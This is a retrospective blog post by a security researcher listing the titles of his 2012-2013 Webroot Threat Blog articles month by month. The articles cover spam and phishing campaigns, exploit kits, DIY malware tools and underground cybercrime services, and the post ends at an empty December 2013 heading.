Historical OSINT - Summarizing 2 Years of Webroot’s Threat Blog Posts Research (2018-07-28 21:00)

It’s been several years since I last posted a quality update at the industry’s leading threat-intelligence gathering

[1]Webroot’s Threat Blog following a successful career as lead security blogger and threat-intelligence analyst

throughout 2012-2014.

In this post I’ll summarize two years worth of Webroot’s Threat Blog research with the idea to provide readers

with the necessary data information and knowledge to stay ahead of current and emerging threats.

01. January - 2012

• [2]Cybercriminals generate malicious Java applets using DIY tools

• [3]A peek inside the uBot malware bot

• [4]Researchers intercept a client-side exploits serving malware campaign

• [5]How phishers launch phishing attacks

• [6]A peek inside the Umbra malware loader

• [7]How malware authors evade antivirus detection

• [8]Inside AnonJDB – a Java based malware distribution platforms for drive-by downloads

• [9]Zappos.com hacked, 24 million users affected

• [10]Inside a clickjacking/likejacking scam distribution platform for Facebook

• [11]A peek inside the Cythosia v2 DDoS Bot

• [12]A peek inside the PickPocket Botnet

• [13]Mass SQL injection attack affects over 200,000 URLs

• [14]Email hacking for hire going mainstream

• [15]Millions of harvested emails offered for sale
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02. February - 2012

• [16]Research: Google’s reCAPTCHA under fire

• [17]Spamvertised ‘You have 1 lost message on Facebook’ campaign leads to pharmaceutical scams

• [18]A peek inside the Smoke Malware Loader

• [19]Researchers spot Citadel, a ZeuS crimeware variant

• [20]Researchers intercept two client-side exploits serving malware campaigns

• [21]Pharmaceutical scammers launch their own Web contest

• [22]The United Nations hacked, Team Poison claims responsibility

• [23]Report: Internet Explorer 9 leads in socially-engineered malware protection

• [24]Twitter adds HTTPS support by default

• [25]Spamvertised “Hallmark ecard” campaign leads to malware

• [26]Report: 3,325 % increase in malware targeting the Android OS

• [27]Why relying on antivirus signatures is simply not enough anymore

• [28]Researchers intercept malvertising campaign using Yahoo’s ad network

• [29]A peek inside the Ann Malware Loader

• [30]Spamvertised ‘Termination of your CPA license’ campaign serving client-side exploits

• [31]How cybercriminals monetize malware-infected hosts

• [32]A peek inside the Elite Malware Loader

• [33]BlackHole exploit kits gets updated with new features

03. March - 2012

• [34]New service converts malware-infected hosts into anonymization proxies

• [35]Spamvertised ‘Temporary Limit Access To Your Account’ emails lead to Citi phishing emails

• [36]A peek inside the Darkness (Optima) DDoS Bot

• [37]Research: proper screening could have prevented 67 % of abusive domain registrations

• [38]Spamvertised ‘Your accountant license can be revoked’ emails lead to client-side exploits and malware

• [39]Spamvertised ‘Google Pharmacy’ themed emails lead to pharmaceutical scams

• [40]Research: U.S accounts for 72 % of fraudulent pharmaceutical orders

• [41]Millions of harvested U.S government and U.S military email addresses offered for sale

• [42]Trojan Downloaders actively utilizing Dropbox for malware distribution
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• [43]Spamvertised ‘Your tax return appeal is declined’ emails serving client-side exploits and malware

• [44]Malicious USPS-themed emails circulating in the wild

• [45]Spamvertised LinkedIn notifications serving client-side exploits and malware

• [46]Tens of thousands of web sites affected in ongoing mass SQL injection attack

• [47]Spamvertised Verizon-themed ‘Your Bill Is Now Available’ emails lead to ZeuS crimeware

• [48]Spamvertised ‘Scan from a Hewlett-Packard ScanJet’ emails lead to client-side exploits and malware

04. April - 2012

• [49]Email hacking for hire going mainstream – part two

• [50]Spamvertised ‘US Airways’ themed emails serving client-side exploits and malware

• [51]New underground service offers access to hundreds of hacked PCs

• [52]New DIY email harvester released in the wild

05. May - 2012

• [53]Managed SMS spamming services going mainstream

• [54]A peek inside a boutique cybercrime-friendly E-shop

• [55]Cybercriminals release ‘Sweet Orange’ – new web malware exploitation kit

• [56]Spamvertised ‘Pizzeria Order Details’ themed campaign serving client-side exploits and malware

• [57]Poison Ivy trojan spreading across Skype

• [58]A peek inside a managed spam service

• [59]Ongoing ‘LinkedIn Invitation’ themed campaign serving client-side exploits and malware

• [60]Spamvertised bogus online casino themed emails serving adware

• [61]Spamvertised ‘YouTube Video Approved’ and ‘Twitter Support” themed emails lead to pharmaceutical

scams

• [62]A peek inside a boutique cybercrime-friendly E-shop – part two

• [63]Spamvertised CareerBuilder themed emails serving client-side exploits and malware

• [64]Pop-ups at popular torrent trackers serving W32/Casonline adware

• [65]‘Windstream bill’ themed emails serving client-side exploits and malware

06. June - 2012

• [66]Cybercriminals infiltrate the music industry by offering full newly released albums for just $1
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• [67]A peek inside a boutique cybercrime-friendly E-shop – part three

• [68]DDoS for hire services offering to ‘take down your competitor’s web sites’ going mainstream

• [69]Skype propagating Trojan targets Syrian activists

• [70]Spamvertised ‘UPS Delivery Notification’ emails serving client-side exploits and malware

• [71]Spamvertised ‘DHL Package delivery report’ emails serving malware

• [72]Spamvertised ‘Your Amazon.com order confirmation’ emails serving client-side exploits and malware

• [73]Cybercriminals populate Scribd with bogus adult content, spread malware using Comodo Backup

• [74]Spamvertised ‘Your Paypal Ebay.com payment’ emails serving client-side exploits and malware

• [75]‘Create a Cartoon of You” ads serving MyWebSearch toolbar

• [76]Spamvertised ‘Your UPS delivery tracking’ emails serving client-side exploits and malware

• [77]Spamvertised ‘Confirm PayPal account” notifications lead to phishing sites

• [78]Spamvertised ‘DHL Express Parcel Tracking Notification’ emails serving malware

• [79]Spamvertised bogus online casino themed emails serving W32/Casonline

07. July - 2012

• [80]Cybercriminals launch managed SMS flooding services

• [81]117,000 unique U.S visitors offered for malware conversion

• [82]Phishing campaign targeting Gmail, Yahoo, AOL and Hotmail spotted in the wild

• [83]What’s the underground market’s going rate for a thousand U.S based malware infected hosts?

• [84]Spamvertised American Airlines themed emails lead to Black Hole exploit kit

• [85]Online dating scam campaign currently circulating in the wild

• [86]New Russian service sells access to compromised social networking accounts

• [87]Cybercriminals impersonate UPS in client-side exploits and malware serving spam campaign

• [88]Russian Ask.fm spamming tool spotted in the wild

• [89]Spamvertised Intuit themed emails lead to Black Hole exploit kit

• [90]Cybercriminals impersonate Booking.com, serve malware using bogus ‘Hotel Reservation Confirmation’

themed emails

• [91]Spamvertised Craigslist themed emails lead to Black Hole exploit kit

• [92]Cybercriminals impersonate law enforcement, spamvertise malware-serving ‘Speeding Ticket’ themed

emails

• [93]Spamvertised ‘Download your USPS Label’ themed emails serve malware
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• [94]Cybercriminals target Twitter, spread thousands of exploits and malware serving tweets

• [95]Russian spammers release Skype spamming tool

• [96]Spamvertised ‘Your Ebay funds are cleared’ themed emails lead to Black Hole exploit kit

08. August - 2012

• [97]Spamvertised AICPA themed emails lead to Black Hole exploit kit

• [98]Spamvertised ‘PayPal has sent you a bank transfer’ themed emails lead to Black Hole exploit kit

• [99]Ongoing spam campaign impersonates LinkedIn, serves exploits and malware

• [100]Millions of spamvertised emails lead to W32/Casonline

• [101]Cybercriminals impersonate AT &T’s Billing Service, serve exploits and malware

• [102]IRS themed spam campaign leads to Black Hole exploit kit

• [103]Cybercriminals spamvertise bogus greeting cards, serve exploits and malware

• [104]Spamvertised ‘Federal Tax Payment Rejected’ themed emails lead to Black Hole exploit kit

• [105]Spamvertised ‘Fwd: Scan from a Hewlett-Packard ScanJet’ emails lead to Black Hole exploit kit

• [106]Spamvertised ‘Royal Mail Shipping Advisory’ themed emails serve malware

• [107]Cybercriminals impersonate Intuit Market, mass mail millions of exploits and malware serving emails

• [108]Cybercriminals spamvertise PayPay themed ‘Notification of payment received’ emails, serve malware

• [109]Cybercriminals impersonate UPS, serve malware

09. September - 2012

• [110]Spamvertised ‘Wire Transfer Confirmation’ themed emails lead to Black Hole exploit kit

• [111]Intuit themed ‘QuickBooks Update: Urgent’ emails lead to Black Hole exploit kit

• [112]Cybercriminals resume spamvertising bogus greeeting cards, serve exploits and malware

• [113]Cybercriminals abuse Skype’s SMS sending feature, release DIY SMS flooders

• [114]New Russian service sells access to thousands of automatically registered accounts

• [115]Spamvertised ‘Your Fedex invoice is ready to be paid now’ themed emails lead to Black Hole Exploit kit

• [116]New Russian DIY SMS flooder using ICQ’s SMS sending feature spotted in the wild

• [117]Spamvertised ‘US Airways reservation confirmation’ themed emails serve exploits and malware

• [118]Cybercriminals impersonate FDIC, serve client-side exploits and malware

• [119]Managed Ransomware-as-a-Service spotted in the wild
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• [120]A peek inside a boutique cybercrime-friendly E-shop – part four

• [121]New E-shop selling stolen credit cards data spotted in the wild

• [122]From Russia with iPhone selling affiliate networks

• [123]New Russian DIY DDoS bot spotted in the wild

10. October - 2012

• [124]New Russian DIY DDoS bot spotted in the wild

• [125]Recently launched E-shop sells access to hundreds of hacked PayPal accounts

• [126]New Russian service sells access to compromised Steam accounts

• [127]‘Vodafone Europe: Your Account Balance’ themed emails serve malware

• [128]Cybercriminals impersonate UPS, serve client-side exploits and malware

• [129]‘Your video may have illegal content’ themed emails serve malware

• [130]Cybercriminals spamvertise ‘Amazon Shipping Confirmation’ themed emails, serve client-side exploits and

malware

• [131]American Airlines themed emails lead to the Black Hole Exploit Kit

• [132]Bogus Facebook notifications lead to malware

• [133]Spamvertised ‘KLM E-ticket’ themed emails serve malware

• [134]‘Intuit Payroll Confirmation inquiry’ themed emails lead to the Black Hole exploit kit

• [135]Malware campaign spreading via Facebook direct messages spotted in the wild

• [136]‘Regarding your Friendster password’ themed emails lead to Black Hole exploit kit

• [137]Russian cybercriminals release new DIY DDoS malware loader

• [138]PayPal ‘Notification of payment received’ themed emails serve malware

• [139]Cybercriminals impersonate Delta Airlines, serve malware

• [140]‘Your UPS Invoice is Ready’ themed emails serve malware

• [141]Bogus Skype ‘Password successfully changed’ notifications lead to malware

• [142]Cybercriminals impersonate Verizon Wireless, serve client-side exploits and malware

• [143]Spamvertised ‘BT Business Direct Order’ themed emails lead to malware

• [144]Cybercriminals spamvertise millions of British Airways themed e-ticket receipts, serve malware

• [145]Cybercriminals spamvertise millions of bogus Facebook notifications, serve malware

• [146]Nuclear Exploit Pack goes 2.0
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11. November - 2012

• [147]BofA ‘Online Banking Passcode Reset’ themed emails serve client-side exploits and malware

• [148]‘ADP Immediate Notification’ themed emails lead to Black Hole Exploit Kit

• [149]USPS ‘Postal Notification’ themed emails lead to malware

• [150]‘Fwd: Scan from a Xerox W. Pro’ themed emails lead to Black Hole Exploit Kit

• [151]‘Your Discover Card Services Blockaded’ themed emails serve client-side exploits and malware

• [152]‘Payroll Account Holded by Intuit’ themed emails lead to Black Hole Exploit Kit

• [153]‘American Express Alert: Your Transaction is Aborted’ themed emails serve client-side exploits and mal-

ware

• [154]Cybercriminals abuse major U.S SMS gateways, release DIY Mail-to-SMS flooders

• [155]‘PayPal Account Modified’ themed emails lead to Black Hole Exploit Kit

• [156]Bogus Better Business Bureau themed notifications serve client-side exploits and malware

• [157]Cybercriminals spamvertise bogus eFax Corporate delivery messages, serve multiple malware variants

• [158]Bogus IRS ‘Your tax return appeal is declined’ themed emails lead to malware

• [159]‘Copies of Missing EPLI Policies’ themed emails lead to Black Hole Exploit Kit

• [160]Cybercriminals spamvertise bogus ‘Microsoft License Orders’ serve client-side exploits and malware

• [161]Cybercriminals resume spamvertising ‘Payroll Account Cancelled by Intuit’ themed emails, serve client-

side exploits and malware

• [162]Cybercriminals spamvertise millions of FDIC ‘Your activity is discontinued’ themed emails, serve client-side

exploits and malware

• [163]Cybercriminals release stealthy DIY mass iFrame injecting Apache 2 modules

• [164]Multiple ‘Inter-company’ invoice themed campaigns serve malware and client-side exploits

• [165]Bogus Facebook ‘pending notifications’ themed emails serve client-side exploits and malware

• [166]Cybercriminals target U.K users with bogus ‘Pay by Phone Parking Receipts’ serve malware

• [167]Bogus DHL ‘Express Delivery Notifications’ serve malware

• [168]Cybercriminals impersonate Vodafone U.K, spread malicious MMS notifications

• [169]Cybercriminals impersonate T-Mobile U.K, serve malware

• [170]Bogus ‘Meeting Reminder” themed emails serve malware

• [171]Bogus ‘Intuit Software Order Confirmations’ lead to Black Hole Exploit Kit

• [172]Bogus ‘End of August Invoices’ themed emails serve malware and client-side exploits
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12. December - 2012

• [173]DIY malicious domain name registering service spotted in the wild

• [174]Fake ‘FedEx Tracking Number’ themed emails lead to malware

• [175]Bogus ‘Facebook Account Cancellation Request’ themed emails serve client-side exploits and malware

• [176]Malicious ‘Security Update for Banking Accounts’ emails lead to Black Hole Exploit Kit

• [177]A peek inside a boutique cybercrime-friendly E-shop – part five

• [178]Fake ‘Flight Reservation Confirmations’ themed emails lead to Black Hole Exploit Kit

• [179]Malicious ‘Sendspace File Delivery Notifications’ lead to Black Hole Exploit Kit

• [180]Fake Chase ‘Merchant Billing Statement’ themed emails lead to malware

• [181]Cybercriminals entice potential cybercriminals into purchasing bogus credit cards data

• [182]Fake ‘Change Facebook Color Theme’ events lead to rogue Chrome extensions

• [183]Fake ‘Citi Account Alert’ themed emails lead to Black Hole Exploit Kit

• [184]Spamvertised ‘Work at Home” scams impersonating CNBC spotted in the wild

• [185]Pharmaceutical scammers spamvertise YouTube themed emails, entice users into purchasing counterfeit

drugs

• [186]Cybercriminals resume spamvertising British Airways themed E-ticket receipts, serve malware

• [187]Fake ‘UPS Delivery Confirmation Failed’ themed emails lead to Black Hole Exploit Kit

12. January - 2013

• [188]Spamvertised ‘Your Recent eBill from Verizon Wireless’ themed emails serve client-side exploits and mal-

ware

• [189]Fake BBB (Better Business Bureau) Notifications lead to Black Hole Exploit Kit

• [190]‘Attention! Changes in the bank reports!’ themed emails lead to Black Hole Exploit Kit

• [191]Fake ‘You have made an Ebay purchase’ themed emails lead to client-side exploits and malware

• [192]A peek inside a boutique cybercrime-friendly E-shop – part six

• [193]Black Hole Exploit Kit author’s ‘vertical market integration’ fuels growth in malicious Web activity

• [194]Spamvertised AICPA themed emails serve client-side exploits and malware

• [195]‘Please confirm your U.S Airways online registration’ themed emails lead to Black Hole Exploit Kit

• [196]Malicious DIY Java applet distribution platforms going mainstream

• [197]Fake ‘ADP Speedy Notifications’ lead to client-side exploits and malware
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• [198]Cybercriminals release automatic CAPTCHA-solving bogus Youtube account generating tool

• [199]‘Batch Payment File Declined’ EFTPS themed emails lead to Black Hole Exploit Kit

• [200]Cybercriminals resume spamvertising fake Vodafone ‘A new picture or video message’ themed emails,

serve malware

• [201]Leaked DIY malware generating tool spotted in the wild

• [202]Email hacking for hire going mainstream – part three

• [203]Android malware spreads through compromised legitimate Web sites

• [204]Fake Intuit ‘Direct Deposit Service Informer’ themed emails lead to Black Hole Exploit Kit

• [205]Fake LinkedIn ‘Invitation Notifications’ themed emails lead to client-side exploits and malware

• [206]Novice cybercriminals experiment with DIY ransomware tools

• [207]Bogus ‘Your Paypal Transaction Confirmation’ themed emails lead to Black Hole Exploit Kit

• [208]Fake ‘FedEx Online Billing – Invoice Prepared to be Paid’ themed emails lead to Black Hole Exploit Kit

• [209]A peek inside a DIY password stealing malware

• [210]Malicious ‘Facebook Account Cancellation Request” themed emails serve client-side exploits and malware

12. February - 2013

• [211]Fake Booking.com ‘Credit Card was not Accepted’ themed emails lead to malware

• [212]Fake FedEx ‘Tracking ID/Tracking Number/Tracking Detail’ themed emails lead to malware

• [213]‘Your Kindle e-book Amazon receipt’ themed emails lead to Black Hole Exploit Kit

• [214]New DIY HTTP-based botnet tool spotted in the wild

• [215]Mobile spammers release DIY phone number harvesting tool

• [216]New underground service offers access to thousands of malware-infected hosts

• [217]Targeted ‘phone ring flooding’ attacks as a service going mainstream

• [218]Fake ‘You’ve blocked/disabled your Facebook account’ themed emails serve client-side exploits and mal-

ware

• [219]Spamvertised IRS ‘Income Tax Refund Turned Down’ themed emails lead to Black Hole Exploit Kit

• [220]Malware propagates through localized Facebook Wall posts

• [221]Malicious ‘RE: Your Wire Transfer’ themed emails serve client-side exploits and malware

• [222]New underground E-shop offers access to hundreds of hacked PayPal accounts

• [223]Fake ‘Verizon Wireless Statement” themed emails lead to Black Hole Exploit Kit

• [224]DIY malware cryptor as a Web service spotted in the wild
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• [225]Malicious ‘Data Processing Service’ ACH File ID themed emails serve client-side exploits and malware

• [226]How mobile spammers verify the validity of harvested phone numbers

• [227]How much does it cost to buy 10,000 U.S.-based malware-infected hosts?

13. March - 2013

• [228]New DIY IRC-based DDoS bot spotted in the wild

• [229]Cybercriminals release new Java exploits centered exploit kit

• [230]Segmented Russian “spam leads” offered for sale

• [231]New DIY hacked email account content grabbing tool facilitates cyber espionage on a mass scale

• [232]New DIY unsigned malicious Java applet generating tool spotted in the wild

• [233]Commercial Steam ‘information harvester/mass group inviter’ could lead to targeted fraudulent cam-

paigns

• [234]Fake BofA CashPro ‘Online Digital Certificate” themed emails lead to malware

• [235]Spamvertised BBB ‘Your Accreditation Terminated” themed emails lead to Black Hole Exploit Kit

• [236]New ZeuS source code based rootkit available for purchase on the underground market

• [237]Cybercriminals resume spamvertising ‘Re: Fwd: Wire Transfer’ themed emails, serve client-side exploits

and malware

• [238]‘ADP Package Delivery Notification’ themed emails lead to Black Hole Exploit Kit

• [239]Cybercrime-friendly community branded HTTP/SMTP based keylogger spotted in the wild

• [240]Hacked PCs as ‘anonymization stepping-stones’ service operates in the open since 2004

• [241]Fake ‘CNN Breaking News Alerts’ themed emails lead to Black Hole Exploit Kit

• [242]Spotted: cybercriminals working on new Western Union based ‘money mule management’ script

• [243]Malicious ‘BBC Daily Email’ Cyprus bailout themed emails lead to Black Hole Exploit Kit

• [244]‘ADP Payroll Invoice’ themed emails lead to malware

• [245]‘Terminated Wire Transfer Notification/ACH File ID” themed malicious campaigns lead to Black Hole Exploit

Kit

• [246]New DIY RDP-based botnet generating tool leaks in the wild

• [247]A peek inside the EgyPack Web malware exploitation kit

14. April - 2013

• [248]DIY Java-based RAT (Remote Access Tool) spotted in the wild

• [249]Spamvertised ‘Re: Changelog as promised’ themed emails lead to malware
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• [250]Cybercrime-friendly service offers access to tens of thousands of compromised accounts

• [251]Madi/Mahdi/Flashback OS X connected malware spreading through Skype

• [252]Cybercriminals selling valid ‘business card’ data of company executives across multiple verticals

• [253]A peek inside the ‘Zerokit/0kit/ring0 bundle’ bootkit

• [254]DIY Skype ring flooder offered for sale

• [255]Spamvertised ‘Your order for helicopter for the weekend’ themed emails lead to malware

• [256]A peek inside a ‘life cycle aware’ underground market ad for a private keylogger

• [257]American Airlines ‘You can download your ticket’ themed emails lead to malware

• [258]Cybercriminals offer spam-friendly SMTP servers for rent [259]

• [260]How mobile spammers verify the validity of harvested phone numbers – part two

• [261]A peek inside a (cracked) commercially available RAT (Remote Access Tool)

• [262]DIY Russian mobile number harvesting tool spotted in the wild

• [263]DIY SIP-based TDoS tool/number validity checker offered for sale

• [264]CAPTCHA-solving Russian email account registration tool helps facilitate cybercrime

• [265]Historical OSINT – The ‘Boston Marathon explosion’ and ‘Fertilizer plant explosion in Texas’ themed mal-

ware campaigns

• [266]Fake ‘DHL Delivery Report’ themed emails lead to malware

• [267]Cybercriminals impersonate Bank of America (BofA), serve malware

• [268]How fraudulent blackhat SEO monetizers apply Quality Assurance (QA) to their DIY doorway generators

• [269]Managed ‘Russian ransomware’ as a service spotted in the wild

15. May - 2013

• [270]FedWire ‘Your Wire Transfer’ themed emails lead to malware

• [271]A peek inside a CVE-2013-0422 exploiting DIY malicious Java applet generating tool

• [272]New IRC/HTTP based DDoS bot wipes out competing malware

• [273]New version of DIY Google Dorks based mass website hacking tool spotted in the wild

• [274]Citibank ‘Merchant Billing Statement’ themed emails lead to malware

• [275]Fake Amazon ‘Your Kindle E-Book Order’ themed emails circulating in the wild, lead to client-side exploits

and malware

• [276]Cybercriminals impersonate New York State’s Department of Motor Vehicles (DMV), serve malware

• [277]Cybercriminals offer HTTP-based keylogger for sale, accept Bitcoin
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• [278]Newly launched E-shop for hacked PCs charges based on malware ‘executions’

• [279]New subscription-based ‘stealth Bitcoin miner’ spotted in the wild

• [280]Fake ‘Free Media Player’ distributed via rogue ‘Adobe Flash Player HD’ advertisement

• [281]New versatile and remote-controlled “Android.MouaBot” malware found in the wild

• [282]Newly launched ‘Magic Malware’ spam campaign relies on bogus ‘New MMS’ messages

• [283]Commercial ‘form grabbing’ rootkit spotted in the wild

• [284]DIY malware cryptor as a Web service spotted in the wild – part two

• [285]CVs and sensitive info soliciting email campaign impersonates NATO

• [286]New commercially available DIY invisible Bitcoin miner spotted in the wild

• [287]Fake ‘Export License/Payment Invoice’ themed emails lead to malware

• [288]Compromised Indian government Web site leads to Black Hole Exploit Kit

• [289]Cybercriminals resume spamvertising Citibank ‘Merchant Billing Statement’ themed emails, serve mal-

ware

• [290]Marijuana-themed DDoS for hire service spotted in the wild

• [291]Fake ‘Vodafone U.K Images’ themed malware serving spam campaign circulating in the wild

16. June - 2013

• [292]Compromised FTP/SSH account privilege-escalating mass iFrame embedding platform released on the un-

derground marketplace

• [293]New E-shop sells access to thousands of hacked PCs, accepts Bitcoin

• [294]Pharmaceutical scammers impersonate Facebook’s Notification System, entice users into purchasing coun-

terfeit drugs

• [295]iLivid ads lead to ‘Searchqu Toolbar/Search Suite’ PUA (Potentially Unwanted Application)

• [296]Hacked Origin, Uplay, Hulu Plus, Netflix, Spotify, Skype, Twitter, Instagram, Tumblr, Freelancer accounts

offered for sale

• [297]Scammers impersonate the UN Refugee Agency (UNHCR), seek your credit card details

• [298]Fake ‘Unsuccessful Fax Transmission’ themed emails lead to malware

• [299]Tens of thousands of spamvertised emails lead to W32/Casonline

• [300]Rogue ads lead to SafeMonitorApp Potentially Unwanted Application (PUA)

• [301]How cybercriminals apply Quality Assurance (QA) to their malware campaigns before launching them

• [302]Rogue ads target EU users, expose them to Win32/Toolbar.SearchSuite through the KingTranslate PUA

• [303]New boutique iFrame crypting service spotted in the wild
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• [304]Rogue ‘Oops Video Player’ attempts to visually social engineer users, mimicks Adobe Flash Player’s installation process

• [305]New E-Shop sells access to thousands of malware-infected hosts, accepts Bitcoin

• [306]New subscription-based SHA256/Scrypt supporting stealth DIY Bitcoin mining tool spotted in the wild

• [307]Rogue ‘Free Mozilla Firefox Download’ ads lead to ‘InstallCore’ Potentially Unwanted Application (PUA)

• [308]SIP-based API-supporting fake caller ID/SMS number supporting DIY Russian service spotted in the wild

• [309]Rogue ‘Free Codec Pack’ ads lead to Win32/InstallCore Potentially Unwanted Application (PUA)

• [310]Self-propagating ZeuS-based source code/binaries offered for sale

• [311]How cybercriminals create and operate Android-based botnets

17. July - 2013

• [312]Cybercriminals experiment with Tor-based C &C, ring-3-rootkit empowered, SPDY form grabbing malware

bot

• [313]Deceptive ads targeting German users lead to the ‘W32/SomotoBetterInstaller’ Potentially Unwanted Ap-

plication (PUA)

• [314]Newly launched underground market service harvests mobile phone numbers on demand

• [315]Novel ransomware tactic locks users’ PCs, demands that they participate in a survey to get the unlock code

• [316]Spamvertised ‘Export License/Invoice Copy’ themed emails lead to malware

• [317]Cybercriminals spamvertise tens of thousands of fake ‘Your Booking Reservation at Westminster Hotel’

themed emails, serve malware

• [318]New commercially available mass FTP-based proxy-supporting doorway/malicious script uploading appli-

cation spotted in the wild

• [319]Fake ‘iGO4 Private Car Insurance Policy Amendment Certificate’ themed emails lead to malware

• [320]Tens of thousands of spamvertised emails lead to the Win32/PrimeCasino PUA (Potentially Unwanted

Application)

• [321]Spamvertised ‘Vodafone U.K MMS ID/Fake Sage 50 Payroll’ themed emails lead to (identical) malware

• [322]New commercially available Web-based WordPress/Joomla brute-forcing tool spotted in the wild

• [323]Rogue ads targeting German users lead to Win32/InstallBrain PUA (Potentially Unwanted Application)

• [324]Yet another commercially available stealth Bitcoin/Litecoin mining tool spotted in the wild

• [325]Protected: Deceptive ‘Media Player Update’ ads expose users to the rogue ‘Video Downloader/Bundlore’

Potentially Unwanted Application (PUA)

• [326]Newly launched ‘HTTP-based botnet setup as a service’ empowers novice cybercriminals with bulletproof

hosting capabilities
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• [327]Fake ‘Copy of Vodafone U.K Contract/Your Monthly Vodafone Bill is Ready/New MMS Received’ themed

emails lead to malware

• [328]Rogue ads lead to the ‘Free Player’ Win32/Somoto Potentially Unwanted Application (PUA)

• [329]How much does it cost to buy one thousand Russian/Eastern European based malware-infected hosts?

• [330]Custom USB sticks bypassing Windows 7/8’s AutoRun protection measure going mainstream

• [331]DIY commercially-available ‘automatic Web site hacking as a service’ spotted in the wild

18. August - 2013

• [332]‘Malware-infected hosts as stepping stones’ service offers access to hundreds of compromised U.S based

hosts

• [333]New ‘Hacked shells as a service’ empowers cybercriminals with access to high page rank-ed Web sites

• [334]Fake ‘iPhone Picture Snapshot Message’ themed emails lead to malware

• [335]Malicious Bank of America (BofA) ‘Statement of Expenses’ themed emails lead to client-side exploits and

malware

• [336]Cybercriminals spamvertise fake ‘O2 U.K MMS’ themed emails, serve malware

• [337]One-stop-shop for spammers offers DKIM-verified SMTP servers, harvested email databases and training

to potential customers

• [338]Fake ‘Apple Store Gift Card’ themed emails serve client-side exploits and malware

• [339]Newly launched managed ‘malware dropping’ service spotted in the wild

• [340]Cybercrime-friendly underground traffic exchange helps facilitate fraudulent and malicious activity

• [341]From Vietnam with tens of millions of harvested emails, spam-ready SMTP servers and DIY spamming

tools

• [342]DIY Craigslist email collecting tools empower spammers with access to fresh/valid email addresses

• [343]Bulletproof TDS/Doorways/Pharma/Spam/Warez hosting service operates in the open since 2009

• [344]DIY automatic cybercrime-friendly ‘redirectors generating’ service spotted in the wild

• [345]Cybercriminals offer spam-ready SMTP servers for rent/direct managed purchase

• [346]Cybercrime-friendly underground traffic exchanges help facilitate fraudulent and malicious activity – part

two

19. September - 2013

• [347]DIY malicious Android APK generating ‘sensitive information stealer’ spotted in the wild

• [348]Web-based DNS amplification DDoS attack mode supporting PHP script spotted in the wild

• [349]Managed Malicious Java Applets Hosting Service Spotted in the Wild
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• [350]Affiliate network for mobile malware impersonates Google Play, tricks users into installing premium-rate SMS sending rogue apps

• [351]419 advance fee fraudsters abuse CNN’s ‘Email This’ Feature, spread Syrian Crisis themed scams

• [352]Cybercriminals offer anonymous mobile numbers for ‘SMS activation’, video tape the destruction of the

SIM card on request

• [353]Yet another ‘malware-infected hosts as anonymization stepping stones’ service offering access to hundreds

of compromised hosts spotted in the wild

• [354]Cybercriminals experiment with ‘Socks4/Socks5/HTTP’ malware-infected hosts based DIY DoS tool

• [355]Cybercriminals sell access to tens of thousands of malware-infected Russian hosts

• [356]Spamvertised “FDIC: Your business account” themed emails serve client-side exploits and malware

• [357]Cybercriminals experiment with Android compatible, Python-based SQL injecting releases

• [358]Newly launched E-shop offers access to hundreds of thousands of compromised accounts

• [359]DIY commercial CAPTCHA-solving automatic email account registration tool available on the underground

market since 2008

• [360]Yet another subscription-based stealth Bitcoin mining tool spotted in the wild

20. October - 2013

• [361]A peek inside a Blackhat SEO/cybercrime-friendly doorways management platform

• [362]Newly launched ‘HTTP-based botnet setup as a service’ empowers novice cybercriminals with bulletproof

hosting capabilities – part two [363]

• [364]‘T-Mobile MMS message has arrived’ themed emails lead to malware

• [365]DDoS for hire vendor ‘vertically integrates’ starts offering TDoS attack capabilities

• [366]Commercially available Blackhat SEO enabled multi-third-party product licenses empowered VPSs spotted

in the wild

• [367]New cybercrime-friendly iFrames-based E-shop for traffic spotted in the wild

• [368]Cybercriminals offer spam-friendly SMTP servers for rent – part two

• [369]Newly launched VDS-based cybercrime-friendly hosting provider helps facilitate fraudulent/malicious on-

line activity

• [370]Fake ‘You have missed emails’ GMail themed emails lead to pharmaceutical scams

• [371]Compromised Turkish Government Web site leads to malware

• [372]Novice cyberciminals offer commercial access to five mini botnets

• [373]Spamvertised T-Mobile ‘Picture ID Type:MMS” themed emails lead to malware

• [374]Yet another Bitcoin accepting E-shop offering access to thousands of hacked PCs spotted in the wild
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• [375]Malicious ‘FW: File’ themed emails lead to malware

• [376]Mass iframe injection campaign leads to Adobe Flash exploits

• [377]Rogue ads lead to the ‘Mipony Download Accelerator/FunMoods Toolbar’ PUA (Potentially Unwanted Ap-

plication)

• [378]A peek inside the administration panel of a standardized E-shop for compromised accounts

• [379]U.K users targeted with fake ‘Confirming your Sky offer’ malware serving emails

• [380]New DIY compromised hosts/proxies syndicating tool spotted in the wild

• [381]Rogue ads lead to the ‘EzDownloaderpro’ PUA (Potentially Unwanted Application)

• [382]Fake ‘Scanned Image from a Xerox WorkCentre’ themed emails lead to malware

• [383]Fake ‘Important: Company Reports’ themed emails lead to malware

• [384]Cybercriminals release new commercially available Android/BlackBerry supporting mobile malware bot

• [385]Fake WhatsApp ‘Voice Message Notification/1 New Voicemail’ themed emails lead to malware

21. November - 2013

• [386]Google-dorks based mass Web site hacking/SQL injecting tool helps facilitate malicious online activity

• [387]Deceptive ads lead to the SpyAlertApp PUA (Potentially Unwanted Application)

• [388]Cybercriminals differentiate their ‘access to compromised PCs’ service proposition, emphasize on the

prevalence of ‘female bot slaves’

• [389]New vendor of ‘professional DDoS for hire service’ spotted in the wild

• [390]Source code for proprietary spam bot offered for sale, acts as force multiplier for cybercrime-friendly ac-

tivity

• [391]Low Quality Assurance (QA) iframe campaign linked to May’s Indian government Web site compromise

spotted in the wild

• [392]Popular French torrent portal tricks users into installing the BubbleDock/Downware/DownloadWare PUA

(Potentially Unwanted Application)

• [393]Web site of Brazilian ‘Prefeitura Municipal de Jaqueira’ compromised, leads to fake Adobe Flash player

• [394]Malicious multi-hop iframe campaign affects thousands of Web sites, leads to a cocktail of client-side

exploits

• [395]Vendor of TDoS products/services releases new multi-threaded SIP-based TDoS tool

• [396]Cybercriminals spamvertise tens of thousands of fake ‘Sent from my iPhone’ themed emails, expose users

to malware

• [397]Fake ‘Annual Form (STD-261) – Authorization to Use Privately Owned Vehicle on State Business’ themed

emails lead to malware

• [398]‘Newly released proxy-supporting Origin brute-forcing tools targets users with weak passwords’
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• [399]Fake WhatsApp ‘Voice Message Notification’ themed emails expose users to malware

• [400]Cybercriminals impersonate HSBC through fake ‘payment e-Advice’ themed emails, expose users to mal-

ware

• [401]Fake ‘MMS Gallery’ notifications impersonate T-Mobile U.K, expose users to malware

• [402]Fake ‘October’s Billing Address Code’ (BAC) form themed spam campaign leads to malware

21. December - 2013

